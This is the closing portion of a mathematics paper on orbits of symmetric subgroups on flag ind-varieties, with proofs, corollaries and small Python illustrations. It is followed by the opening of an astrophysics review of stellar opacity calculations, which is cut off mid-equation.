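To make the combinatorics of $\iota_n$ concrete, here is an illustrative Python sketch (the list-of-labels encoding of a flag is ours, purely for illustration): a complete flag of $V_n$ is recorded as the ordered tuple of basis labels spanning its successive one-dimensional quotients, and the label $n+1$ (for $e_{n+1}$) is inserted at the position that $\sigma$ dictates.

```python
def embed_flag(seq, sigma):
    """iota_n: map a complete flag of V_n, encoded as the ordered list of
    basis labels spanning its successive quotients, into X_{n+1} by
    inserting the label n+1 at the position determined by sigma."""
    n = len(seq)
    # m = number of a_k with a_k < sigma(n+1); then F'_k = F_k for k <= m
    # and F'_k = F_{k-1} + <e_{n+1}> for k > m, i.e. insert at index m.
    m = sum(1 for l in range(1, n + 2) if sigma(l) < sigma(n + 1))
    return seq[:m] + [n + 1] + seq[m:]

# two extreme total orders on N*: sigma(l) = l and sigma(l) = -l
inc, dec = [1], [1]
for _ in range(2):
    inc = embed_flag(inc, lambda l: l)    # increasing order: e_{n+1} enters on top
    dec = embed_flag(dec, lambda l: -l)   # decreasing order: e_{n+1} enters at the bottom
```

The two orders already show how the position of the inserted subspace depends on $\sigma$: `inc` ends as `[1, 2, 3]` while `dec` ends as `[3, 2, 1]`.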
Therefore, we get a chain of embeddings (which are morphisms of algebraic varieties)
\[\cdots \hookrightarrow X_{n-1} \stackrel{\iota_{n-1}}{\hookrightarrow} X_n \stackrel{\iota_{n}}{\hookrightarrow} X_{n+1} \stackrel{\iota_{n+1}}{\hookrightarrow} \cdots\]
and $\mathbf{X}$ is obtained as the direct limit
\[\mathbf{X}=\mathbf{X}(\mathcal{F}_\sigma,E)=\lim_\to X_n.\]
In particular for each $n$ we get an embedding $\hat{\iota}_n:X_n\hookrightarrow \mathbf{X}$
and up to identifying $X_n$ with its image by this embedding we can view $\mathbf{X}$ as the union
$\mathbf{X}=\bigcup_{n\geq 1}X_n$.
Every generalized flag $\mathcal{F}\in\mathbf{X}$ belongs to $X_n$ for all $n$ beyond some rank $n_\mathcal{F}$. For instance, $\mathcal{F}_\sigma\in X_n$ for all $n\geq 1$.
A basis $\underline{v}=(v_1,\ldots,v_n)$ of $V_n$ can be completed into the basis of $\mathbf{V}$ denoted by $\underline{\hat{v}}:=(v_1,\ldots,v_n,e_{n+1},e_{n+2},\ldots)$, and we have
\begin{equation}
\label{completed-basis}
\hat{\iota}_n(\mathcal{F}(v_{\tau_1},\ldots,v_{\tau_n}))=\mathcal{F}_\sigma(\underline{\hat{v}})
\end{equation}
(using the notation of Sections \ref{S2.2}--\ref{S2.3})
where $\tau=\tau^{(n)}\in\mathfrak{S}_n$ is the permutation such that
$\sigma(\tau^{(n)}_1)\prec\ldots\prec\sigma(\tau^{(n)}_n)$.
Recall that the ind-topology on $\mathbf{X}$ is defined by declaring a subset $\mathbf{Z}\subset\mathbf{X}$ open (resp., closed) if every intersection $\mathbf{Z}\cap X_n$ is open (resp., closed).
Clearly the ind-variety structure on $\mathbf{X}$ is not modified if the sequence $(X_n,\iota_n)_{n\geq 1}$ is replaced by a subsequence $(X_{n_k},\iota'_k)_{k\geq 1}$
where $\iota'_k:=\iota_{n_{k+1}-1}\circ\cdots\circ\iota_{n_k}$.
In type A3 (using the notation of Section \ref{S2.1}) the subspace $V_n\subset\mathbf{V}$ is endowed with the restrictions of $\phi$ and $\delta$
hence we can define $K_n,G_n^0\subset \mathrm{GL}(V_n)$ (as in Section \ref{S3.2})
and the inclusion of (\ref{4.4-1}) restricts to natural inclusions
$K_n\subset K_{n+1}$ and $G_n^0\subset G_{n+1}^0$.
Next assume that the space $\mathbf{V}$ is endowed with a nondegenerate symmetric or symplectic form $\omega$ determined by the matrix $\Omega$ of (\ref{omega}).
The blocks $J_1,J_2,\ldots$ in the matrix $\Omega$ are of size $1$ or $2$.
We set $n_k:=|J_1|+\ldots+|J_k|$
so that the restriction of $\omega$ to each subspace $V_{n_k}$ is nondegenerate.
Hence in types A1, A2, BD1, C1, C2, and D3 we can define
the subgroups $K_{n_k},G_{n_k}^0\subset \mathrm{GL}(V_{n_k})$
(as in Section \ref{S3})
and (\ref{4.4-1}) yields natural inclusions
\[K_{n_k}\subset K_{n_{k+1}}\quad\mbox{and}\quad G^0_{n_k}\subset G^0_{n_{k+1}}.\]
Moreover, the subvariety $(X_{n_k})_\omega\subset X_{n_k}$ of isotropic flags (with respect to $\omega$) can be defined as in (\ref{2.2.Xomega}).
Assuming that the generalized flag $\mathcal{F}_\sigma$ is $\omega$-isotropic, the embedding
$\iota'_k:X_{n_k}\hookrightarrow X_{n_{k+1}}$ maps $(X_{n_k})_\omega$ into $(X_{n_{k+1}})_\omega$ and we have
\[\mathbf{X}_\omega=\mathbf{X}_\omega(\mathcal{F}_\sigma,E)=\bigcup_{k\geq 1}(X_{n_k})_\omega\quad\mbox{and}\quad (X_{n_k})_\omega=\mathbf{X}_\omega\cap X_{n_k}\ \mbox{for all $k\geq 1$}.\]
In particular, $\mathbf{X}_\omega$ is a closed ind-subvariety of $\mathbf{X}$
(as stated in Proposition \ref{P2.3-3}).
\subsection{Proofs}
\label{S4.proofs}
\begin{proof}[Proof of Proposition \ref{P4-1.1}]
Let $\mathcal{F}=\{F'_a,F''_a:a\in A\}=\mathcal{F}_\sigma(\underline{v})$ for a basis $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$.
Let $w\in\mathfrak{I}_\infty^\epsilon(\iota)$.
If the basis $\underline{v}$ is $w$-dual, then
\[
(F'_a)^\perp=\langle v_\ell:\sigma(w_\ell)\succeq a\rangle_\mathbb{C}
\quad\mbox{and}\quad
(F''_a)^\perp=\langle v_\ell:\sigma(w_\ell)\succ a\rangle_\mathbb{C}\,,
\]
hence $\mathcal{F}^\perp=\mathcal{F}_{\sigma^\perp\iota w}(\underline{v})$;
this yields
$(\mathcal{F}^\perp,\mathcal{F})\in\pmb{\mathbb{O}}^\perp_{w\iota}$.
If $\underline{v}$ is $w$-conjugate, then
\[
\gamma(F'_a)=\langle v_\ell:\sigma(w_\ell)\prec a\rangle_\mathbb{C}
\quad\mbox{and}\quad
\gamma(F''_a)=\langle v_\ell:\sigma(w_\ell)\preceq a\rangle_\mathbb{C}\,,
\]
whence $\gamma(\mathcal{F})=\mathcal{F}_{\sigma w}(\underline{v})$
and
$(\gamma(\mathcal{F}),\mathcal{F})\in\pmb{\mathbb{O}}^\gamma_{w\iota}$.
This proves the inclusions $\subset$ in Proposition \ref{P4-1.1}\,{\rm (b)}.
Note that these inclusions imply in particular that the subsets $\bs{\mathcal{O}}_w$, as well as $\bs{\mathfrak{O}}_w$, are pairwise disjoint.
For $w\in\mathfrak{I}_{n_k}^\epsilon$ we define $\hat{w}:\mathbb{N}^*\to\mathbb{N}^*$ by letting
\[\hat{w}(\ell)=\left\{
\begin{array}{ll}
\tau w\tau^{-1}(\ell) & \mbox{if $\ell\leq n_k$,} \\
\iota(\ell) & \mbox{if $\ell\geq n_k+1$}
\end{array}
\right.\]
where $\tau=\tau^{(n_k)}:\{1,\ldots,n_k\}\to\{1,\ldots,n_k\}$ is the
permutation such that $\sigma(\tau_1)\prec\ldots\prec\sigma(\tau_{n_k})$.
It is easy to see that we obtain a well-defined (injective) map
$j_k:\mathfrak{I}_{n_k}^\epsilon\to\mathfrak{I}_\infty^\epsilon(\iota)$, $j_k(w):=\hat{w}$,
and
\begin{equation}
\label{4.5.0}
\mathfrak{I}_\infty^\epsilon(\iota)=\bigcup_{k\geq 1}j_k(\mathfrak{I}_{n_k}^\epsilon).\end{equation}
Moreover,
given a basis $\underline{v}=(v_1,\ldots,v_{n_k})$ of $V_{n_k}$ and
the basis $\underline{\hat{v}}$ of $\mathbf{V}$ obtained by adding the vectors $e_\ell$ for $\ell\geq n_k+1$,
the implication
\begin{eqnarray}
\label{4.5.1}
& \mbox{$(v_{\tau_1},\ldots,v_{\tau_{n_k}})$ is $w$-dual (resp., $w$-conjugate)} \\
\nonumber
& \Rightarrow \
\mbox{$\underline{\hat{v}}$ is $\hat{w}$-dual (resp., $\hat{w}$-conjugate)}
\end{eqnarray}
clearly follows from our constructions.
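This gluing can be checked mechanically; the following illustrative Python sketch (the encoding of $w$ and $\tau$ as dictionaries and of $\iota$ as a function is ours) verifies that $\hat{w}$ is again an involution, using that $\iota$ preserves $\{n_k+1,n_k+2,\ldots\}$ because the blocks $J_i$ of $\Omega$ do not straddle $n_k$.

```python
def extend_involution(w, tau, iota, n):
    """Return w_hat as a function on {1, 2, ...}:
    w_hat(l) = (tau o w o tau^{-1})(l) for l <= n, and iota(l) for l > n."""
    tau_inv = {v: k for k, v in tau.items()}
    def w_hat(l):
        return tau[w[tau_inv[l]]] if l <= n else iota(l)
    return w_hat

# toy data: w = (1 2)(3)(4) on {1,...,4}, tau a permutation of {1,...,4},
# iota the pairing 1<->2, 3<->4, ... coming from 2x2 blocks of Omega
w = {1: 2, 2: 1, 3: 3, 4: 4}
tau = {1: 3, 2: 1, 3: 4, 4: 2}
iota = lambda l: l + 1 if l % 2 == 1 else l - 1
w_hat = extend_involution(w, tau, iota, 4)
assert all(w_hat(w_hat(l)) == l for l in range(1, 13))  # w_hat is an involution
```

Since conjugation by $\tau$ preserves the involution property below the cutoff and $\iota$ is itself an involution above it, $\hat{w}^2=\mathrm{id}$ holds on all of $\mathbb{N}^*$.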
Note that
\begin{equation}
\label{T-proof.1}
\bs{\mathcal{O}}_{\hat{w}}\cap X_{n_k}=\mathcal{O}_{w}
\quad
\mbox{and}
\quad
\bs{\mathfrak{O}}_{\hat{w}}\cap X_{n_k}=\mathfrak{O}_{w}
\end{equation}
where $\mathcal{O}_w,\mathfrak{O}_w\subset X_{n_k}$ are the orbits defined in Definition \ref{DA12};
indeed, the inclusions $\supset$ in (\ref{T-proof.1}) are implied by
(\ref{completed-basis}) and (\ref{4.5.1}),
whereas the inclusions $\subset$ follow from
Proposition \ref{P1}\,{\rm (c)}
and the fact that the subsets $\bs{\mathcal{O}}_{\hat{w}}$, as well as $\bs{\mathfrak{O}}_{\hat{w}}$,
are pairwise disjoint.
Parts {\rm (a)} and {\rm (c)} of Proposition \ref{P4-1.1} now follow
from (\ref{4.5.0})--(\ref{T-proof.1}) and Proposition \ref{P1}\,{\rm (a)}, {\rm (c)}. By Proposition \ref{P4-1.1}\,{\rm (a)} we deduce that equalities hold in Proposition \ref{P4-1.1}\,{\rm (b)}, and the proof is complete.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P4.2-2}]
For every $n\geq 1$ we set $p_n=|N_+\cap\{1,\ldots,n\}|$ and $q_n=|N_-\cap\{1,\ldots,n\}|$.
Let $\mathcal{F}=\{F'_a,F''_a:a\in A\}=\mathcal{F}_\sigma(\underline{v})$ for some basis $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$.
Let $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$.
If $\underline{v}$ is $(w,\varepsilon)$-conjugate, then
\[
\delta(F'_a)=\langle v_\ell:\sigma(w_\ell)\prec a\rangle_\mathbb{C}
\quad\mbox{and}\quad
\delta(F''_a)=\langle v_\ell:\sigma(w_\ell)\preceq a\rangle_\mathbb{C}
\]
so that $(\delta(\mathcal{F}),\mathcal{F})=(\mathcal{F}_{\sigma w}(\underline{v}),\mathcal{F}_\sigma(\underline{v}))\in\pmb{\mathbb{O}}_w$.
In addition,
\[\left\{
\begin{array}{ll}
\mbox{$F''_{\sigma(\ell)}\cap\mathbf{V}_+/F'_{\sigma(\ell)}\cap\mathbf{V}_+=\langle v_\ell\rangle_\mathbb{C}$, $F''_{\sigma(\ell)}\cap\mathbf{V}_-=F'_{\sigma(\ell)}\cap\mathbf{V}_-$} & \mbox{\!\!\!if $(w_\ell,\varepsilon_\ell)=(\ell,+1)$,} \\[1.5mm]
\mbox{$F''_{\sigma(\ell)}\cap\mathbf{V}_-/F'_{\sigma(\ell)}\cap\mathbf{V}_-=\langle v_\ell\rangle_\mathbb{C}$, $F''_{\sigma(\ell)}\cap\mathbf{V}_+=F'_{\sigma(\ell)}\cap\mathbf{V}_+$} & \mbox{\!\!\!if $(w_\ell,\varepsilon_\ell)=(\ell,-1)$,} \\[1.5mm]
\mbox{$F''_{\sigma(\ell)}\cap\mathbf{V}_+/F'_{\sigma(\ell)}\cap\mathbf{V}_+=\langle v_\ell+v_{w_\ell}\rangle_\mathbb{C}$\,,} \\[1mm]
\mbox{\qquad $F''_{\sigma(\ell)}\cap\mathbf{V}_-/F'_{\sigma(\ell)}\cap\mathbf{V}_-=\langle v_\ell- v_{w_\ell}\rangle_\mathbb{C}$} & \mbox{\!\!\!if $\sigma(w_\ell)\prec\sigma(\ell)$,} \\[1.5mm]
F''_{\sigma(\ell)}\cap \mathbf{V}_+=F'_{\sigma(\ell)}\cap \mathbf{V}_+,\ F''_{\sigma(\ell)}\cap \mathbf{V}_-=F'_{\sigma(\ell)}\cap \mathbf{V}_- & \mbox{\!\!\!if $\sigma(w_\ell)\succ\sigma(\ell)$,}
\end{array}
\right.\]
which proves the formula for $\dim F''_{\sigma(\ell)}\cap \mathbf{V}_\pm/F'_{\sigma(\ell)}\cap \mathbf{V}_\pm$ stated in Proposition \ref{P4.2-2}\,{\rm (b)}.
If $\underline{v}$ is $(w,\varepsilon)$-dual, then we get similarly
\[
(F'_a)^\dag=\langle v_\ell:\sigma(w_\ell)\succeq a\rangle_\mathbb{C}
\quad\mbox{and}\quad
(F''_a)^\dag=\langle v_\ell:\sigma(w_\ell)\succ a\rangle_\mathbb{C}\,.
\]
Hence $(\mathcal{F}^\dag,\mathcal{F})=(\mathcal{F}_{\sigma^\dag w}(\underline{v}),\mathcal{F}_\sigma(\underline{v}))\in\pmb{\mathbb{O}}_w^\dag$.
For $n\geq 1$ large enough we have
$(w_\ell,\varepsilon_\ell)=(\ell,\pm1)$ for all $\ell\in N_\pm\cap\{n+1,n+2,\ldots\}$
and $v_\ell=e_\ell$ for all $\ell\geq n+1$.
Thus the pair $(\check{w},\check{\varepsilon}):=(w|_{\{1,\ldots,n\}},\varepsilon|_{\{1,\ldots,n\}})$ belongs to $\mathfrak{I}_n(p_n,q_n)$
and by (\ref{completed-basis}) we have
\[\mathcal{F}=\mathcal{F}(v_{\tau_1},\ldots,v_{\tau_n}).\]
The basis $(v_{\tau_1},\ldots,v_{\tau_n})$ of $V_n$ is $(\tau^{-1}\check{w}\tau,\check{\varepsilon}\tau)$-dual if $\underline{v}$ is $(w,\varepsilon)$-dual; the last formula in Proposition \ref{P4.2-2}\,{\rm (b)} now follows from Proposition \ref{P2}\,{\rm (b)} and this observation. Altogether this shows the ``only if'' part in
Proposition \ref{P4.2-2}\,{\rm (b)}, which guarantees in particular that the subsets $\bs{\mathcal{O}}_{(w,\varepsilon)}$, as well as the subsets $\bs{\mathfrak{O}}_{(w,\varepsilon)}$,
are pairwise disjoint.
The ``if'' part of Proposition \ref{P4.2-2}\,{\rm (b)} follows once we show
Proposition \ref{P4.2-2}\,{\rm (a)}.
For $(w,\varepsilon)\in\mathfrak{I}_n(p_n,q_n)$
we set
\begin{equation}
\label{4.5.4}
\hat{w}(\ell)=\left\{
\begin{array}{ll}
\tau w\tau^{-1}(\ell) & \mbox{if $\ell\leq n$,} \\
\ell & \mbox{if $\ell\geq n+1$}
\end{array}
\right.\quad\mbox{for all $\ell\in\mathbb{N}^*$,}
\end{equation}
where $\tau=\tau^{(n)}\in\mathfrak{S}_n$ is as in (\ref{completed-basis}), and
\begin{equation}
\label{4.5.5}\hat{\varepsilon}(\ell)=\left\{
\begin{array}{ll}
\varepsilon\tau^{-1}(\ell) & \mbox{if $\ell\leq n$,} \\
1 & \mbox{if $\ell\geq n+1$, $\ell\in N_+$,} \\
-1 & \mbox{if $\ell\geq n+1$, $\ell\in N_-$}
\end{array}
\right.
\end{equation}
for all $\ell\in\mathbb{N}^*$ such that $\hat{w}_\ell=\ell$.
One readily checks that $(\hat{w},\hat{\varepsilon})\in\mathfrak{I}_\infty(N_+,N_-)$,
and that the resulting map $j_n:\mathfrak{I}_n(p_n,q_n)\to\mathfrak{I}_\infty(N_+,N_-)$ is well defined, injective,
and
\[
\mathfrak{I}_\infty(N_+,N_-)=\bigcup_{n\geq 1}j_n(\mathfrak{I}_n(p_n,q_n)).
\]
Moreover, it follows from our constructions that, given a basis $\underline{v}=(v_1,\ldots,v_n)$ of $V_n$ and the basis $\underline{\hat{v}}$ of $\mathbf{V}$ obtained by adding the vectors $e_\ell$ for $\ell\geq n+1$, we have:
\begin{eqnarray*}
& \mbox{$(v_{\tau_1},\ldots,v_{\tau_n})$ is $(w,\varepsilon)$-conjugate (resp., dual)} \\
& \Rightarrow \
\mbox{$\underline{\hat{v}}$ is $(\hat{w},\hat{\varepsilon})$-conjugate (resp., dual)}.
\end{eqnarray*}
As in the proof of Proposition \ref{P4-1.1} we derive the equalities
\begin{equation}
\label{T-proof.2}
\bs{\mathcal{O}}_{(\hat{w},\hat{\varepsilon})}\cap X_{n}=\mathcal{O}_{(w,\varepsilon)}
\quad
\mbox{and}
\quad
\bs{\mathfrak{O}}_{(\hat{w},\hat{\varepsilon})}\cap X_{n}=\mathfrak{O}_{(w,\varepsilon)}
\end{equation}
where $\mathcal{O}_{(w,\varepsilon)},\mathfrak{O}_{(w,\varepsilon)}\subset X_{n}$ are as in Definition \ref{DA3}.
Parts {\rm (a)} and {\rm (c)} of Proposition \ref{P4.2-2} then follow
from Proposition \ref{P2}\,{\rm (a)} and {\rm (c)}.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P4.3}]
Let $n\in\{n_1,n_2,\ldots\}$ (where $n_k=|J_1|+\ldots+|J_k|$ as before), let $(p_n,q_n)=(|N_+\cap\{1,\ldots,n\}|,|N_-\cap\{1,\ldots,n\}|)$,
and let $\tau=\tau^{(n)}:\{1,\ldots,n\}\to\{1,\ldots,n\}$
be the permutation such that $\sigma(\tau_1)\prec\ldots\prec\sigma(\tau_n)$.
Since the generalized flag $\mathcal{F}_\sigma$ is $\omega$-isotropic,
we must have
\[\iota(\tau_\ell)=\tau_{n-\ell+1}\quad\mbox{for all $\ell\in\{1,\ldots,n\}$}.\]
This observation easily implies that the map $j_n$ defined in the proof
of Proposition \ref{P4.2-2}
restricts to a well-defined injective map
\[j_n:\mathfrak{I}^{\eta,\epsilon}_n(p_n,q_n)\to \mathfrak{I}^{\eta,\epsilon}_\infty(N_+,N_-)\]
such that
\[\mathfrak{I}^{\eta,\epsilon}_\infty(N_+,N_-)=\bigcup_{k\geq 1}
j_{n_k}(\mathfrak{I}^{\eta,\epsilon}_{n_k}(p_{n_k},q_{n_k})).\]
By (\ref{T-proof.2}) for $(\hat{w},\hat{\varepsilon})=j_n(w,\varepsilon)$ we get
\begin{equation}
\label{T-proof.3}
\bs{\mathcal{O}}^{\eta,\epsilon}_{(\hat{w},\hat{\varepsilon})}\cap (X_{n})_\omega=\mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}
\quad
\mbox{and}
\quad
\bs{\mathfrak{O}}^{\eta,\epsilon}_{(\hat{w},\hat{\varepsilon})}\cap (X_{n})_\omega=\mathfrak{O}^{\eta,\epsilon}_{(w,\varepsilon)}.
\end{equation}
Proposition \ref{P4.3} easily follows from this fact and Proposition \ref{P3}.
\end{proof}
\section{Corollaries}
\label{S5}
We start with a corollary stating that the parametrization of $\mathbf{K}$- and $\mathbf{G}^0$-orbits on $\mathbf{G}/\mathbf{B}$ depends only on the triple $\left(\mathbf{G},\mathbf{K},\mathbf{G}^0\right)$ and not on the choice of the ind-variety $\mathbf{G}/\mathbf{B}$.
\begin{corollary}
\label{C1}
Let $E,\mathbf{G},\mathbf{K},\mathbf{G}^0$ be as in Section \ref{S2.1}.
Let $\mathcal{F}_{\sigma_j}$ ($j=1,2$) be two
$E$-compatible
maximal generalized flags, which are $\omega$-isotropic in types B,C,D,
and let $\mathbf{X}_j=\mathbf{G}/\mathbf{B}_{\mathcal{F}_{\sigma_j}}$.
Then there are natural bijections
\[
\mathbf{X}_1/\mathbf{K}\cong\mathbf{X}_2/\mathbf{K}
\quad\mbox{and}\quad
\mathbf{X}_1/\mathbf{G}^0\cong\mathbf{X}_2/\mathbf{G}^0
\]
which commute with the duality of Theorem \ref{theorem-1}.
\end{corollary}
Next, a straightforward parameter count yields:
\begin{corollary}
\label{C2}
In Corollary \ref{C1}
the orbit sets $\mathbf{X}_j/\mathbf{K}$ and $\mathbf{X}_j/\mathbf{G}^0$
are always infinite.
\end{corollary}
It is important to note that, despite Corollary \ref{C1}, the topological properties of the orbits on $\mathbf{G}/\mathbf{B}$ are not the same for different choices of Borel ind-subgroups $\mathbf{B}\subset\mathbf{G}$. The following corollary establishes criteria for the existence of open and closed orbits on $\mathbf{G}/\mathbf{B}=\mathbf{X}\left(\mathcal{F}_\sigma,E\right)$.
\begin{corollary}
\label{C3}
Let $E,\mathbf{G},\mathbf{K},\mathbf{G}^0$ be as in Section \ref{S2.1},
and let $\mathcal{F}_\sigma$ be an $E$-compatible maximal generalized flag, $\omega$-isotropic in types B,C,D, where $\sigma:\mathbb{N}^*\to (A,\prec)$ is a bijection onto a totally ordered set.
Let $\mathbf{X}=\mathbf{G}/\mathbf{B}_{\mathcal{F}_\sigma}$; i.e., $\mathbf{X}=\mathbf{X}(\mathcal{F}_\sigma,E)$ in type A and $\mathbf{X}=\mathbf{X}_\omega(\mathcal{F}_\sigma,E)$ in types B,C,D.
\begin{itemize}
\item[\rm ($\mbox{a}_1$)] In type A1,
$\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit) if and only if $\iota(\ell)=\ell$ for all $\ell\gg 1$ (i.e., if the matrix $\Omega$ of (\ref{omega}) contains finitely many diagonal blocks of size 2).
\item[\rm ($\mbox{a}_2$)]
In type A2, $\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit) if and only if
for all $\ell\gg 1$ the elements
$\sigma(2\ell-1),\sigma(2\ell)$ are consecutive in $A$ and
the number $|\{k<2\ell-1:\sigma(k)\prec\sigma(2\ell-1)\}|$ is even.
\item[\rm ($\mbox{a}'_{12}$)]
In types A1 and A2,
$\mathbf{X}$ has at most one closed $\mathbf{K}$-orbit
(equivalently, at most one open $\mathbf{G}^0$-orbit). $\mathbf{X}$ has a closed $\mathbf{K}$-orbit (equivalently an open $\mathbf{G}^0$-orbit) if and only if $\mathbf{X}$ contains $\omega$-isotropic generalized flags. This latter condition is equivalent to the existence of an
involutive antiautomorphism of ordered sets $\iota_A:(A,\prec)\to(A,\prec)$ such that
$\iota_A\sigma(\ell)=\sigma\iota(\ell)$ for all $\ell\gg 1$.
\item[\rm ($\mbox{a}_3$)] In type A3,
$\mathbf{X}$ always has infinitely many closed $\mathbf{K}$-orbits (equivalently, infinitely many open $\mathbf{G}^0$-orbits).
$\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit)
if and only if $d:=\min\{|N_+|,|N_-|\}<\infty$ and $\mathcal{F}_\sigma$
contains a $d$-dimensional and a $d$-codimensional subspace.
\item[\rm (bcd)] In types B,C,D,
$\mathbf{X}$ always has infinitely many closed $\mathbf{K}$-orbits (equivalently, open $\mathbf{G}^0$-orbits).
In types C1 and D3, $\mathbf{X}$ never has an open $\mathbf{K}$-orbit (equivalently, no closed $\mathbf{G}^0$-orbit).
In types BD1 and C2, $\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit)
if and only if $d:=\min\{|N_+|,|N_-|\}<\infty$ and $\mathcal{F}_\sigma$ has a $d$-dimensional subspace (or equivalently it has a $d$-codimensional subspace).
\end{itemize}
\end{corollary}
\begin{proof}
This follows from Remarks \ref{R-open} and \ref{R-closed}, Propositions \ref{P4-1.1}, \ref{P4.2-2}, \ref{P4.3}, and relations (\ref{T-proof.1}), (\ref{T-proof.2}), (\ref{T-proof.3}).
\end{proof}
\begin{corollary}
The only situation where $\mathbf{X}$ simultaneously has open and closed $\mathbf{K}$-orbits (equivalently, open and closed $\mathbf{G}^0$-orbits) is in types
A3, BD1, C2, in the case where $d:=\min\{|N_+|,|N_-|\}<\infty$ and $\mathcal{F}_\sigma$
contains a $d$-dimensional and a $d$-codimensional subspace.
\end{corollary}
\section*{Index of notation}
\begin{itemize}
\item[\S\ref{S.intro}:] $\mathbb{N}^*$, $|A|$, $\mathfrak{S}_n$, $\mathfrak{S}_\infty$, $(k;\ell)$
\smallskip
\item[\S\ref{S2.1}:] $\mathbf{G}(E)$, $\mathbf{G}(E,\omega)$, $\Omega$, $\omega$, $\gamma$, $\Phi$, $\phi$, $\delta$
\smallskip
\item[\S\ref{S2.2}:] $\mathcal{F}(v_1,\ldots,v_n)$, $\mathbb{O}_w$
\smallskip
\item[\S\ref{S2.3}:] $\mathcal{F}_\sigma(\underline{v})$, $\mathcal{F}_\sigma$,
$\mathbf{P}_\mathcal{F}$, $\mathbf{B}_\mathcal{F}$, $\mathbf{X}(\mathcal{F},E)$, $(\pmb{\mathbb{O}}_{\tau,\sigma})_w$, $\mathbf{X}_\omega(\mathcal{F},E)$
\smallskip
\item[\S\ref{S3.1}:] $\mathcal{F}^\perp$, $\gamma(\mathcal{F})$, $\mathfrak{I}_n$, $\mathfrak{I}'_n$, $\mathcal{O}_w$, $\mathfrak{O}_w$
\smallskip
\item[\S\ref{S3.2}:] $\delta(\mathcal{F})$, $\mathcal{F}^\dag$, $\varsigma(\phi:\mathcal{F})$, $\varsigma(\delta:\mathcal{F})$, $\varsigma(w,\varepsilon)$, $\mathfrak{I}_n(p,q)$, $\mathcal{O}_{(w,\varepsilon)}$, $\mathfrak{O}_{(w,\varepsilon)}$
\smallskip
\item[\S\ref{S3.3}:] $\mathfrak{I}^{\eta,\epsilon}_n(p,q)$, $\mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}$, $\mathfrak{O}^{\eta,\epsilon}_{(w,\varepsilon)}$
\smallskip
\item[\S\ref{S4.1}:] $\iota$, $\mathfrak{I}_\infty(\iota)$, $\mathfrak{I}'_\infty(\iota)$, $\bs{\mathcal{O}}_w$, $\bs{\mathfrak{O}}_w$, $(A^*,\prec^*)$, $\sigma^\perp$, $\mathbf{X}^\perp$, $\mathbf{X}^\gamma$, $\pmb{\mathbb{O}}_w^\perp$, $\pmb{\mathbb{O}}_w^\gamma$
\smallskip
\item[\S\ref{S4.2}:] $\mathfrak{I}_\infty(N_+,N_-)$, $\bs{\mathcal{O}}_{(w,\varepsilon)}$, $\bs{\mathfrak{O}}_{(w,\varepsilon)}$, $\sigma^\dag$, $\mathbf{X}^\dag$, $\pmb{\mathbb{O}}_w$, $\pmb{\mathbb{O}}_w^\dag$
\smallskip
\item[\S\ref{S4.3}:] $\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$, $\bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$, $\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$
\end{itemize}
proofpile-arXiv_065-9560 | \section{\label{intro} Introduction}
The {\em {Workshop on Astrophysical Opacities}} \cite{pis92} was held at the IBM Venezuela Scientific Center in Caracas during the week of 15 July 1991. Although this meeting included several leading researchers concerned with the computation of atomic and molecular opacities, it was a timely encounter between the two teams, namely the Opacity Project (OP) \footnote{http://cdsweb.u-strasbg.fr/topbase/TheOP.html} and OPAL \footnote{http://opalopacity.llnl.gov/opal.html}, that had addressed a 10-year-old plea~\cite{sim82} to revise the Los Alamos Astrophysical Opacity Library (LAAOL) \cite{cox76}. The mood at the time was jovial because, in spite of the contrasting quantum mechanical frameworks and equations of state implemented by the two groups and the ensuing big-data computations, the general level of agreement of the new Rosseland mean opacities (RMO) was outstanding.
Further refinements of the opacity data sets carried out the following decade, namely the inclusion of inner-shell contributions by the OP \cite{bad05}, led in fact to improved accord. However, a downward revision of the solar metal abundances in 2005 resulting from non-LTE 3D hydrodynamic simulations of the photosphere \cite{asp05} compromised very precise benchmarks in the standard solar model (SSM) with the helioseismic and neutrino-flux predictions \cite{bah05a, bah05b}. Since then things have never been the same.
Independent photospheric hydrodynamic simulations have essentially confirmed the lower metal abundances, especially of the volatiles (C, N, and O) \cite{caf11}. The opacity increases required to compensate for the abundance corrections have neither been completely matched in extensive revisions of the numerical methods, theoretical approximations, and transition inventories \cite{jin09, gil11, nah11, tur11, bla12, gil12, bus13, del13, gil13, tur13a, tur13b, tur13c, fon15, igl15a, mon15, pai15, pen15, kri16a, kri16b, nah16a, bla16, nah16b, tur16a}, nor in a new generation of opacity tables (OPLIB) \footnote{http://aphysics2.lanl.gov/opacity/lanl/} by Los Alamos \cite{col16}, nor even in recent innovative opacity experiments \cite{bai15}. Nonetheless, unexplained disparities in the modeling of asteroseismic observations of hybrid B-type pulsators with OP and OPAL opacities still seem to question their definitive reliability \cite{das10}.
In the present report we give an overview of this ongoing multidisciplinary discussion, and within the context of the OP approach, analyze some of the theoretical shortcomings that could be impairing a more complete and accurate opacity accounting. In particular we discuss spectator-electron processes responsible for the broad and asymmetric resonances arising from core photoexcitation, K-shell resonance widths, and ionization edges since it has been recently shown that the solar opacity profile is sensitive to the Stark broadening of K lines \cite{kri16b}.
\section{\label{teams} OP and OPAL Projects}
In a plasma where local thermodynamic equilibrium (LTE) can be assumed, the specific radiative intensity $I_\nu$ is not very different from the Planck function $B_\nu(T)$ and the flux can be estimated by a diffusion approximation
\begin{equation}
\mathbf{F}=-\frac{4\pi}{3\kappa_R}\,\frac{{\rm d}B}{{\rm d}T}\nabla T
\end{equation}
with
\begin{equation}
\frac{{\rm d}B}{{\rm d}T}=\int_0^\infty \frac{\partial B_\nu}{\partial T}{\rm d}\nu
\end{equation}
and
\begin{equation}
